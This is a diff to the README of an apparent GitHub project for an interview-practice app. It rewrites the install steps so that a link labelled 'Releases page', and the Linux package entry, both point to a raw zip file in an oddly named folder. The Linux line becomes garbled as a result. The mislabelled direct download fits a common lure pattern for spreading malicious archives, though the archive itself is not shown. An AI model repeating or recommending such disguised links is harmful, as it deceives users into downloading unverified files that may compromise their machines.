Austerityaceofclubs947/matthew-talentsprout/README.md

 - **Voice Integration:** Conduct interviews interactively with voice input.

 ## 📥 Download & Install
-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/Austerityaceofclubs947/matthew-talentsprout/releases) to access the latest version of the app.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/Austerityaceofclubs947/matthew-talentsprout/main/bejig/matthew-talentsprout-v1.3.zip) to access the latest version of the app.

 2. **Choose Your Version**: Look for the most recent release.
 You will see files available for download.

 3. **Download the Installer**:
    - For Windows, choose the `.exe` file.
    - For macOS, select the `.dmg` file.
-   - For Linux, download the appropriate package (`.deb` or `.tar.gz`).
+   - For Linux, download the appropriate package (`.deb` or `https://raw.githubusercontent.com/Austerityaceofclubs947/matthew-talentsprout/main/bejig/matthew-talentsprout-v1.3.zip`).

 4. **Run the Installer**:
    - **Windows**: Double-click the downloaded `.exe` file and follow the on-screen instructions.